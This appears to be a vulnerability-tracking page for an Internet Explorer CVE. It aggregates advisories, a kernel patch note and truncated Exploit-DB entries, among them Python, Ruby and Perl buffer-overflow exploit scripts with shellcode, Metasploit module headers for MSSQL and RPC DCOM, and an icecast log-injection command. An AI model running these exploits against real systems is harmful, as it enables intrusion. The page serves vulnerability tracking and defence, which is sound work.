CVE-2011-2000
published 2011-10-12CVE-2011-2000: Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a…
PriorityP353critical9.3CVSS 2.0
AVNACMAuNCCICAC
EPSS
18.89%
96.9th percentile
Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Body Element Remote Code Execution Vulnerability."
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat6.8MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-hrr3-r677-j752: Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessi
ghsa_unreviewed·2022-05-13
CVE-2011-2000 [HIGH] GHSA-hrr3-r677-j752: Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessi
Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Body Element Remote Code Execution Vulnerability."
Kernel
namei: allow restricted O_CREAT of FIFOs and regular files
kernel_security·2018-08-23·CVSS 7.2
CVE-2000-1134 [HIGH] namei: allow restricted O_CREAT of FIFOs and regular files
namei: allow restricted O_CREAT of FIFOs and regular files
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
Red Hat
jasper: heap buffer overflow in jpc_dec_cp_setfromcox() (rejected duplicate of CVE-2011-4516)
vendor_redhat·2016-10-17·CVSS 6.8
CVE-2016-8880 [MEDIUM] CWE-122 jasper: heap buffer overflow in jpc_dec_cp_setfromcox() (rejected duplicate of CVE-2011-4516)
jasper: heap buffer overflow in jpc_dec_cp_setfromcox() (rejected duplicate of CVE-2011-4516)
[REJECTED CVE] A heap-based buffer overflow flaw was found in the way JasPer decoded JPEG 2000 compressed image files. An attacker could create a malicious JPEG 2000 compressed image file that, when opened, would cause applications that use JasPer (such as Nautilus) to crash or, potentially, execute arbitrary code.
Statement: This flaw was found to be a duplicate of CVE-2011-4516. Please see https://access.redhat.com/security/cve/CVE-2011-4516 for information about affected products and security errata.
Package: netpbm (Red Hat Enterprise Linux 5) - Not affected
Package: jasper (Red Hat Enterprise Linux 6) - Not affected
Package: jasper (Red Hat Enterprise Linux 7) - Not affected
Package: mi
Red Hat
jasper: insufficient memory allocation in jpc_crg_getparms() (rejected duplicate of CVE-2011-4517)
vendor_redhat·2016-10-17·CVSS 6.8
CVE-2016-8881 [MEDIUM] CWE-122 jasper: insufficient memory allocation in jpc_crg_getparms() (rejected duplicate of CVE-2011-4517)
jasper: insufficient memory allocation in jpc_crg_getparms() (rejected duplicate of CVE-2011-4517)
[REJECTED CVE] A heap-based buffer overflow flaw was found in the way JasPer decoded JPEG 2000 compressed image files. An attacker could create a malicious JPEG 2000 compressed image file that, when opened, would cause applications that use JasPer (such as Nautilus) to crash or, potentially, execute arbitrary code.
Statement: This flaw was found to be a duplicate of CVE-2011-4517. Please see https://access.redhat.com/security/cve/CVE-2011-4517 for information about affected products and security errata.
Package: netpbm (Red Hat Enterprise Linux 5) - Not affected
Package: jasper (Red Hat Enterprise Linux 6) - Not affected
Package: jasper (Red Hat Enterprise Linux 7) - Not affected
Packag
Red Hat
jasper: heap buffer overflow flaws lead to arbitrary code execution (CERT VU#887409)
vendor_redhat·2011-12-08·CVSS 6.8
CVE-2011-4517 [MEDIUM] CWE-122 jasper: heap buffer overflow flaws lead to arbitrary code execution (CERT VU#887409)
jasper: heap buffer overflow flaws lead to arbitrary code execution (CERT VU#887409)
The jpc_crg_getparms function in libjasper/jpc/jpc_cs.c in JasPer 1.900.1 uses an incorrect data type during a certain size calculation, which allows remote attackers to trigger a heap-based buffer overflow and execute arbitrary code, or cause a denial of service (heap memory corruption), via a crafted component registration (CRG) marker segment in a JPEG2000 file.
A heap-based buffer overflow flaw was found in the way JasPer decoded JPEG 2000 compressed image files. An attacker could create a malicious JPEG 2000 compressed image file that, when opened, would cause applications that use JasPer (such as Nautilus) to crash or, potentially, execute arbitrary code.
Red Hat
jasper: heap buffer overflow flaws lead to arbitrary code execution (CERT VU#887409)
vendor_redhat·2011-12-08·CVSS 6.8
CVE-2011-4516 [MEDIUM] CWE-122 jasper: heap buffer overflow flaws lead to arbitrary code execution (CERT VU#887409)
jasper: heap buffer overflow flaws lead to arbitrary code execution (CERT VU#887409)
Heap-based buffer overflow in the jpc_cox_getcompparms function in libjasper/jpc/jpc_cs.c in JasPer 1.900.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted numrlvls value in a coding style default (COD) marker segment in a JPEG2000 file.
A heap-based buffer overflow flaw was found in the way JasPer decoded JPEG 2000 compressed image files. An attacker could create a malicious JPEG 2000 compressed image file that, when opened, would cause applications that use JasPer (such as Nautilus) to crash or, potentially, execute arbitrary code.
No detection rules found.
Exploit-DB
NSHC Papyrus 2.0 - Heap Overflow
exploitdb·2011-08-13
NSHC Papyrus 2.0 - Heap Overflow
NSHC Papyrus 2.0 - Heap Overflow
---
#!/usr/bin/python
#
# Title: NSHC Papyrus Heap Overflow Vulnerability
# Date: 13\08\2011
# Author: wh1ant
# Software Link: http://file.atfile.com/ftp/data/03/PapyrusSetup.exe
# Version: 2.0
# Tested On: windows XP SP3 South Korea / windows XP SP3 English VMware Workstation
# CVE: N/A
# Notice:
# Encrypt/Decrypt programs that are created by NSHC
#
fd = open("Attack.txt", "w")
data = 'A'
for i in range(0, 1003):
fd.write(data)
fd.write("BBBB");
fd.write("CCCC");
for i in range(0, 2000):
fd.write(data);
fd.close()
Exploit-DB
Freefloat FTP Server 1.0 - 'MKD' Remote Buffer Overflow
exploitdb·2011-07-17
Freefloat FTP Server 1.0 - 'MKD' Remote Buffer Overflow
Freefloat FTP Server 1.0 - 'MKD' Remote Buffer Overflow
---
#!/usr/bin/ruby
#
#[+]Exploit Title: FreeFloat FTP Server MKD Buffer Overflow Exploit
#[+]Date: 16\06\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
#[+]Version: 1.00
#[+]Tested On: Windows XP SP3 Brazilian
#[+]CVE: N/A
#
#
require 'socket'
def banner()
print """
==========FreeFloat FTP Server MKD Buffer Overflow Exploit=======
==========Autor C4SS!0 G0M3S=====================================
==========E-mail [email protected]============================
"""
end
def exploit(buf,ip,porta)
begin
s = TCPSocket.new(ip,porta.to_i)
s.recv(20000)
s.puts "USER test\r\n"
s.recv(2000)
s.puts "PASS test\r\n"
s.recv(2000)
s.puts "MKD #{buf}\r\n"
s.close
s = TCPSocket.new(ip,
Exploit-DB
SimplyPlay 66 - '.pls' Local Buffer Overflow
exploitdb·2011-04-14
SimplyPlay 66 - '.pls' Local Buffer Overflow
SimplyPlay 66 - '.pls' Local Buffer Overflow
---
#!/usr/bin/perl
#
#[+]Exploit Title: SimplyPlay V.66 .PLS File Buffer Overflow Vulnerability
#[+]Date: 14\04\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/SimplyPlay.shtml
#[+]Version: Revision 66
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
print q{
Exploit Buffer Overflow Revision:66(UNICODE - SEH)
Created BY C4SS!0 G0M3S
E-mail [email protected]
Site www.exploit-br.org
};
sleep(1);
$buf = "\x41" x 2000;
$buf .= "\x41" x 53;
$buf .= "\x58\x50";
$buf .= "\xa9\x45";#P/P/RETN 0x004500A9
$buf .= "\x41\x50\x61\xc9\xc8\x41\x50\x41\xc3";
$buf .= "\x41" x 11;
$buf .=
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ".
"ABABQI1
Exploit-DB
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
exploitdb·2011-02-08
CVE-2008-5416 Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
---
##
# $Id: ms09_004_sp_replwritetovarbin_sqli.rb 11730 2011-02-08 23:31:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Window
Exploit-DB
Microsoft SQL Server - Payload Execution (via SQL Injection) (Metasploit)
exploitdb·2011-02-08
CVE-2000-1209 Microsoft SQL Server - Payload Execution (via SQL Injection) (Metasploit)
Microsoft SQL Server - Payload Execution (via SQL Injection) (Metasploit)
---
##
# $Id: mssql_payload_sqli.rb 11730 2011-02-08 23:31:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server Payload Execution via SQL injection',
'Description' => %q{
This module will execute an arbitrary payload on a Microsoft SQL
Server, using a SQL injection vulnerability.
Once a vulnerability is identified this module
will use xp_cmdshell to upload and execute Metasploit payloads.
It is necessary to specify the exact point where th
Exploit-DB
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
exploitdb·2011-01-24
CVE-2008-5416 Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
---
##
# $Id: ms09_004_sp_replwritetovarbin.rb 11631 2011-01-24 19:37:58Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,
and Microsoft Desktop
Exploit-DB
Microsoft RPC DCOM Interface - Remote Overflow (MS03-026) (Metasploit)
exploitdb·2011-01-11
CVE-2003-0352 Microsoft RPC DCOM Interface - Remote Overflow (MS03-026) (Metasploit)
Microsoft RPC DCOM Interface - Remote Overflow (MS03-026) (Metasploit)
---
##
# $Id: ms03_026_dcom.rb 11545 2011-01-11 17:56:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft RPC DCOM Interface Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the RPCSS service, this vulnerability
was originally found by the Last Stage of Delirium research group and has been
widely exploited ever since. This module can exploit the English versions of
Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windo
Zscaler
Zscaler found Multiple Security Vulnerabilities | 11-11-2011
blogs_zscaler·CVSS 9.3
[CRITICAL] Zscaler found Multiple Security Vulnerabilities | 11-11-2011
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Bugzilla
CVE-2011-4612 icecast2: Newline injection in error.log
bugzilla·2011-12-15·CVSS 5.0
CVE-2011-4612 [MEDIUM] CVE-2011-4612 icecast2: Newline injection in error.log
CVE-2011-4612 icecast2: Newline injection in error.log
A security bug was reported by Moritz Naumann against icecast in
Ubuntu. You are being emailed as the upstream contact. Please keep
[email protected][1] CC'd for any updates on this issue.
This issue should be considered public and has not yet been assigned a
CVE.
Details from the public bug follow:
https://launchpad.net/bugs/894782
From the reporter:
"Newline injection in error.log
Running this command against an icecast2 running on 127.0.0.1...
echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d%
0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d%
0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN%
20fserve/fserve_client_create%20req%20for%20file%
20"'"'"/usr/share/icecast2/web/ HTTP/
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-081https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13083https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-081https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13083
2011-10-12
Published